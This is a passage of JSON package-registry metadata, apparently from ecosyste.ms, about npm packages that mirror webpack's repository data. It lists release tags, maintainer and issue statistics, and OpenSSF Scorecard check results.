","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-26T03:51:48.376Z","dependent_packages_count":0,"downloads":20,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":38.79100384105411,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":20.278895927175476},"purl":"pkg:npm/teld-webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/teld-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/teld-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/teld-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:00:07.885Z","issues_count":10163,"pull_requests_count":9423,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2749833.8614084506,"issues_closed_count":9897,"pull_requests_closed_count":8875,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.834399291547771,"avg_comments_per_pull_request":3.1735116205030245,"merged_pull_requests_count":6013,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":81,"past_year_pull_requests_count":926,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":364617.14285714284,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":728,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":63,"past_year_avg_comments_per_issue":3.3950617283950617,"past_year_avg_comments_per_pull_request":4.818574514038877,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":575,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1070,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":428,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/teld-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/teld-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/teld-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/teld-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/teld-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/teld-webpack/codemeta","maintainers":[{"uuid":"teld","login":"teld","name":null,"email":"chendong@teld.cn","url":null,"packages_count":24,"html_url":"https://www.npmjs.com/~teld","role":null,"created_at":"2022-11-14T18:21:31.678Z","updated_at":"2022-11-14T18:21:31.678Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/teld/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2569063,"name":"webpack_base420","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":4,"first_release_published_at":"2021-04-09T04:54:13.760Z","latest_release_published_at":"2021-04-09T06:45:08.744Z","latest_release_number":"0.0.4","last_synced_at":"2026-09-03T00:23:09.772Z","created_at":"2022-04-10T03:39:34.813Z","updated_at":"2026-09-03T00:23:09.772Z","registry_url":"https://www.npmjs.com/package/webpack_base420","install_command":"npm install webpack_base420","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"0.0.4"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: 